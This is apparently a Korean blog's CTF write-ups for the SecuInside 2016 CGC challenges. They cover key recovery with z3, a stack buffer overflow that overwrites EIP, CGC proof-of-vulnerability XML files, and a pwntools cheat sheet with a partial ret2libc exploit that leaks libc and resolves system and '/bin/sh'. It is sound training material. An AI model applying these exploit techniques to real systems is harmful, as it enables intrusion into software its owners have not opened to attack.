     + 15_byte_805F462 == 556 )
    ++v1;
  if ( 02_byte_805F455
     + 13_byte_805F460
     + 22_byte_805F469
     + 20_byte_805F467
     + 19_byte_805F466
     + 03_byte_805F456
     + 04_byte_805F457
     + 12_byte_805F45F
     + 16_byte_805F463
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 18_byte_805F465
     + 25_byte_805F46C
     + 09_byte_805F45C
     + 06_byte_805F459
     + 11_byte_805F45E
     + 21_byte_805F468
     + 17_byte_805F464 == 1464 )
    ++v1;
  if ( 15_byte_805F462
     + 22_byte_805F469
     + 08_byte_805F45B
     + 23_byte_805F46A
     + 21_byte_805F468
     + 06_byte_805F459
     + 17_byte_805F464
     + 11_byte_805F45E
     + 12_byte_805F45F == 758 )
    ++v1;
  return v1 == 25;


여기에 있는 변수를 다음과 같이 치환하여 python의 수학 라이브러리인 z3 라이브러리를 활용 하여 맞는 값을 찾습니다.

(※ z3 : https://github.com/Z3Prover/z3)

babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages

babyhack@ubuntu:~$ cd ./build/make; sudo make install


z3가 준비 되었다면, 다음의 코드를 사용하면 됩니다.


from z3 import *

var_0 = Int('var_0')
var_1 = Int('var_1')
var_2 = Int('var_2')
var_3 = Int('var_3')
var_4 = Int('var_4')
var_5 = Int('var_5')
var_6 = Int('var_6')
var_7 = Int('var_7')
var_8 = Int('var_8')
var_9 = Int('var_9')
var_10 = Int('var_10')
var_11 = Int('var_11')
var_12 = Int('var_12')
var_13 = Int('var_13')
var_14 = Int('var_14')
var_15 = Int('var_15')
var_16 = Int('var_16')
var_17 = Int('var_17')
var_18 = Int('var_18')
var_19 = Int('var_19')
var_20 = Int('var_20')
var_21 = Int('var_21')
var_22 = Int('var_22')
var_23 = Int('var_23')
var_24 = Int('var_24')
var_25 = Int('var_25')

solve(var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,var_22 + var_23 + var_11 == 275,var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758)  


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py
[var_16 = 89,
 var_23 = 85,
 var_20 = 82,
 var_1 = 72,
 var_6 = 69,
 var_12 = 77,
 var_15 = 51,
 var_19 = 85,
 var_22 = 95,
 var_21 = 78,
 var_5 = 77,
 var_14 = 78,
 var_11 = 95,
 var_9 = 72,
 var_3 = 87,
 var_10 = 69,
 var_17 = 95,
 var_4 = 95,
 var_7 = 95,
 var_8 = 84,
 var_2 = 79,
 var_13 = 48,
 var_18 = 84,
 var_24 = 80,
 var_0 = 83]
babyhack@ubuntu:~/tmp/Secuinside/2016$  


10진수로 표시 되기 때문에 문자로 표시 하는 코드를 작성 해야 한다.


[ covert ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py
var_16 = 89
var_23 = 85
var_20 = 82
var_1 = 72
var_6 = 69
var_12 = 77
var_15 = 51
var_19 = 85
var_22 = 95
var_21 = 78
var_5 = 77
var_14 = 78
var_11 = 95
var_9 = 72
var_3 = 87
var_10 = 69
var_17 = 95
var_4 = 95
var_7 = 95
var_8 = 84
var_2 = 79
var_13 = 48
var_18 = 84
var_24 = 80
var_0 = 83

print chr(var_0)+chr(var_1)+chr(var_2)+chr(var_3)+chr(var_4)+chr(var_5)+chr(var_6)+chr(var_7)+chr(var_8)+chr(var_9)+chr(var_10)+chr(var_11)+chr(var_12)+chr(var_13)+chr(var_14)+chr(var_15)+chr(var_16)+chr(var_17)+chr(var_18)+chr(var_19)+chr(var_20)+chr(var_21)+chr(var_22)+chr(var_23)+chr(var_24)
babyhack@ubuntu:~/tmp/Secuinside/2016$


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py
SHOW_ME_THE_M0N3Y_TURN_UP
babyhack@ubuntu:~/tmp/Secuinside/2016$ 


이제 찾은 내용을 테스트 해 보도록 합시다.


 vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP
Get out of here :(
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: SHOW_ME_THE_M0N3Y_TURN_UP
Hi SHOW_ME_THE_M0N3Y_TURN_UP
:

vagrant@crs:~$
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP
Welcome Admin :)
: CK
Segmentation fault (core dumped)
vagrant@crs:~$



CGC에 전달하는 코드 작성은 예제 코드를 기반으로 XML 작성 합니다.


<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
       <cbid>service</cbid>

        <replay>
              // recv
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>-          Simple Echo System          -\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
              // send
              <write><data>ADMIN\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
              // send
              <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>
              // recv
              <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>

              // send
              <write><data>CK\x0a</data></write>
        </replay>
</pov>


exploit 코드는 다음과 같습니다.


#!/usr/bin/python
from pwn import *

xml_name = "pov.xml"
host, port = "127.0.0.1", 1234
r = remote(host,port)
print r.recvline()
r.sendline("XML")
payload = open(xml_name,'rb').read()
print r.recvline()
r.sendline(str(len(payload)))
print r.recvline()
r.sendline(payload)

r.interactive()

반응형
반응형


SecuInside 2016 - CGC/cykor_00001-100



1. cgc 파일 elf 포멧으로 변경


vagrant@crs:~$ cgc2elf cykor_00001
vagrant@crs:~$ ls
cykor_00001 


2. ssh 통신하므로 sftp 활용하여, 파일 복사 후 ida로 분석


signed int sub_80481C0()
{
  char v1; // [esp+3Ch] [ebp-2Ch]@3
  char v2; // [esp+3Dh] [ebp-2Bh]@9
  char v3; // [esp+3Eh] [ebp-2Ah]@10
  char v4; // [esp+3Fh] [ebp-29h]@11
  char v5; // [esp+40h] [ebp-28h]@12
  char v6; // [esp+41h] [ebp-27h]@13
  char v7; // [esp+42h] [ebp-26h]@14
  char v8; // [esp+43h] [ebp-25h]@15
  char v9; // [esp+44h] [ebp-24h]@16
  char v10; // [esp+45h] [ebp-23h]@17
  char v11; // [esp+46h] [ebp-22h]@18
  char v12; // [esp+47h] [ebp-21h]@19
  char v13; // [esp+48h] [ebp-20h]@20
  char v14; // [esp+49h] [ebp-1Fh]@21
  char v15; // [esp+4Ah] [ebp-1Eh]@22
  char v16; // [esp+4Bh] [ebp-1Dh]@23
  int v17; // [esp+54h] [ebp-14h]@26
  unsigned int i; // [esp+58h] [ebp-10h]@1
  int v19; // [esp+60h] [ebp-8h]@1

  v19 = 0;
  for ( i = 0; i < 0x18; ++i )
    *(&v1 + i) = 0;
  if ( sub_8048470(1, (int)"What is your message?\n", 0x16u) )
    sub_804867C(0);
  if ( sub_8048560(0, (int)&v1, 0x18u, 10) )
    return -1;
  if ( v1 != 'H' || v2 != '4' )
    return 7;
  if ( v3 != 'P' || v4 != 'P' )
    return 6;
  if ( v5 != 'Y' || v6 != '_' )
    return 5;
  if ( v7 != 'S' || v8 != '3' )
    return 4;
  if ( v9 != 'C' || v10 != 'U' )
    return 3;
  if ( v11 != 'I' || v12 != 'N' )
    return 2;
  if ( v13 != 'S' || v14 != 'I' )
    return 1;
  if ( v15 == 'D' && v16 == '3'
&& sub_8048470(1, (int)"+ Are you serious?\n", 0x13u) )
    sub_804867C(0);
  v17 = sub_8048 


--> H4PPY_S3CUINSID3


3. 취약한 함수 확인


signed int sub_80480A0()
{
  char v1[64]; // [esp+28h] [ebp-50h]@3
  int v2; // [esp+68h] [ebp-10h]@1
  unsigned int i; // [esp+6Ch] [ebp-Ch]@1

  v2 = 0;
  for ( i = 0; i < 64; ++i )
    v1[i] = 0;
  if ( sub_8048560(0, (int)v1, 128u, 10) )
    return -1;
  for ( i = 0; v1[i]; ++i )
    ++v2;
  if ( sub_8048470(1, (int)"- Why so serious?\n", 0x12u) )
    sub_804867C(0);
  return v2;


--> 입력값이 80개 이상 넣을 경우 bof 발생 (EIP 변경 확인)


vagrant@crs:~$ (python -c 'print "H4PPY_S3CUINSID3" + "\n" + "a"*84 + "b"*4';cat ) |./cykor_00001_cgc_file
What is your message?
+ Are you serious?
- Why so serious?

Segmentation fault (core dumped)
vagrant@crs:~$ gdb ./cykor_00001_cgc_file core                                  GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./cykor_00001_cgc_file...(no debugging symbols found)...done.

warning: core file may not match specified executable file.
[New LWP 3833]
Core was generated by `'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x62626262 in ?? ()
(gdb) i r
eax            0x616161a6       1633771942
ecx            0x12     18
edx            0x80487bf        134514623
ebx            0x0      0
esp            0xbaaaaf8c       0xbaaaaf8c
ebp            0x61616161       0x61616161
esi            0x61616161       1633771873
edi            0x0      0
eip            0x62626262       0x62626262
eflags         0x10292  [ AF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x7b     123
gs             0x7b     123
(gdb) q
vagrant@crs:~$ 


4. CGC에 맞는 xml 코드 작성

 ※ 참고

   1) http://kblab.tistory.com/287 

   2) https://cgc-docs.legitbs.net/cgc-release-documentation/walk-throughs/understanding-cfe-povs/ /

   3) https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/pin-for-decree.md


<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
       <cbid>service</cbid>

        <replay>
              // recv
              <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
              // send
              <write><data>H4PPY_S3CUINSID3\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
              // send, [a * 84]
              <write><data>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>- Are you serious?\x0a</data></match></read>
        </replay>
</pov>


5. 파일 전송


payload = open('crattack.xml', 'rb').read()


print r.recvuntil( 'XML)' )

r.sendline(payload)

print r.recv()


r.interactive()


반응형
반응형


  • vagrant는 VM 이미지를 관리하는 제품입니다.
    • https://www.vagrantup.com/
  • Virtual Box
    • https://www.virtualbox.org/
  • CGC 환경 설정 파일
    • https://s3.amazonaws.com/cgcdist/boxes/Vagrantfile
  • CGC 설명
    • https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/virtual-competiton.md



1. vagrant 명령어를 활용하여, 가상 머신을 다운 받는다.


CGC 환경 설정 파일을 vagrant 폴더에 복사 합니다.


2016-08-02  오후 02:28    <DIR>          .
2016-08-02  오후 02:28    <DIR>          ..
2016-08-02  오후 02:28    <DIR>          .vagrant
2015-12-21  오후 10:33         2,526,208 vagrant.exe
2016-08-02  오후 12:14             2,573 Vagrantfile

C:\HashiCorp\Vagrant\bin>vagrant.exe up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
==> cb: Clearing any previously set forwarded ports...
==> cb: Clearing any previously set network interfaces...
==> cb: Preparing network interfaces based on configuration...
    cb: Adapter 1: nat
    cb: Adapter 2: hostonly
==> cb: Forwarding ports...
    cb: 22 (guest) => 2222 (host) (adapter 1)
==> cb: Running 'pre-boot' VM customizations...
==> cb: Booting VM...
==> cb: Waiting for machine to boot. This may take a few minutes...
    cb: SSH address: 127.0.0.1:2222
    cb: SSH username: vagrant
    cb: SSH auth method: private key

............

C:\HashiCorp\Vagrant\bin>vagrant.exe status
Current machine states:

cb                        running (virtualbox)
ids                       running (virtualbox)
pov                       running (virtualbox)
crs                       running (virtualbox)
ti                        running (virtualbox)

This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.

.....................

C:\HashiCorp\Vagrant\bin>vagrant.exe ssh crs
`ssh` executable not found in any directories in the %PATH% variable. Is an
SSH client installed? Try installing Cygwin, MinGW or Git, all of which
contain an SSH client. Or use your favorite SSH client with the following
authentication information shown below:

Host: 127.0.0.1
Port: 2202
Username: vagrant
Private key: C:/Users/JP20614/.vagrant.d/insecure_private_key

2. putty client 사용하기 위해서는 puttygen.exe를 통하여 개인키를 생성해야 한다.


3. putty client 설정 내용

  - ID : vagrant

  - IP : 127.0.0.1

  - Port : 2202


4. CGC 서버 설명

  • ti - this is the Team Interface. The role represents the interface that will be provided to a CRS by the CFE infrastructure.
  • cb - this is the Challenge Binary server. This is the host where CBs are executed.
  • pov - this is the POV server. This role has the responsibility of 'throwing' POVs (and polls) at the cb server.
  • crs - this is a host for simulating a CRS. While no, simulated CRS capabilities are distributed as part of Virtual Competition, a sample client is provided to exercise the Team Interface.
  • ids - this is the IDS host; the network appliance. Filters fielded by a CRS will be installed on ids. From a network perspective, ids is in between pov and cb.




반응형
반응형

[ pwn 예제 코드 ]

 

from pwn import *


#r = process('./pwn1')
r = remote('127.0.0.1', 1234)

payload = '-1'
payload += 'a'* 44
payload += '\xcd\x84\x04\x08'
payload += '\n'

print '[*] payload\n%s' % hexdump(payload)

r.sendline(payload)
print r.recv()

#r.interactive()

 

[ XML 파일 전송 ]


from pwn import *


r = remote('127.0.0.1', 1234)

payload = open('crattack.xml', 'rb').read()


print r.recvuntil( 'XML)' )

r.sendline(payload)


r.interactive()



 

[ 사용하는 라이브러리 확인 ]

 

babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -r ./pwn2

Relocation section '.rel.dyn' at offset 0x2fc contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000705 R_386_COPY        0804a040   stdout

Relocation section '.rel.plt' at offset 0x30c contains 6 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   getchar
0804a014  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a01c  00000507 R_386_JUMP_SLOT   00000000   setvbuf
0804a020  00000607 R_386_JUMP_SLOT   00000000   atoi
babyhack@ubuntu:~/tmp/sctf2016/pwn2$  

 

 

[ offset 찾는 방법 ]

 

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'system' | more
#   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ strings -a -tx /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'
# 15f5db /bin/sh


# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'printf' | more
#.............................
#   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
#.............................

offset_printf = 0x4A130
offset_system = 0x3B160
offset_binsh = 0x15F5DB

#------------ printf_got leak -------#
#    +----------------------------+

#    |       aaaaaa.....aaaa          |

#    +----------------------------+

#    |            printf_plt           |

#    +----------------------------+

#    |             vuln()               |

#    +----------------------------+

#    |            '%s'                  |

#    +----------------------------+

#    |           print_got            |

#    +----------------------------+

 

payload += printf_plt
payload += vuln
payload += string_format
payload += printf_got

 

print '[*] payload\n%s\n' % hexdump(payload)

s.sendline(payload)

print '[*] first recv\n%s\n' % s.recvline()
print '[*] second recv\n%s\n' % s.recvline()

printf_got_leak = s.recvline()
print '[*] printf got\n%s\n' % hexdump(printf_got_leak)

libc_printf_got = hex(u32(printf_got_leak[:4]))

print '[*] lib_printf_got : ', libc_printf_got
 

libc_addr = int(libc_printf_got, 16) - offset_printf
system_addr = libc_addr + offset_system
binsh_addr = libc_addr + offset_binsh

print '[*] libc addr : ', hex(libc_addr)
print '[*] system addr : ', hex(system_addr)
print '[*] /bin/sh addr : ', hex(binsh_addr)

 

[ gadget 찾기 ]

 

https://github.com/0vercl0k/rp

 

#./rp++ -f ./pwn2 -r 4 | grep 'pop'
# 0x0804864e: pop edi ; pop ebp ; ret  ;  (1 found)
ppr = p32(0x0804864E) # 2 argument so, pop pop ret 

 

[ gdb code patch ]

 

(gdb) set *(unsigned char*)0x400cc3 = 0x90
(gdb) set *(unsigned char*)0x400cc4 = 0x90
(gdb) set *(unsigned char*)0x400ccd = 0x90
(gdb) set *(unsigned char*)0x400cce = 0x90
(gdb) set *(unsigned char*)0x400cd7 = 0x90
(gdb) set *(unsigned char*)0x400cd8 = 0x90
(gdb) disas main 

 

 

 

 

반응형

+ Recent posts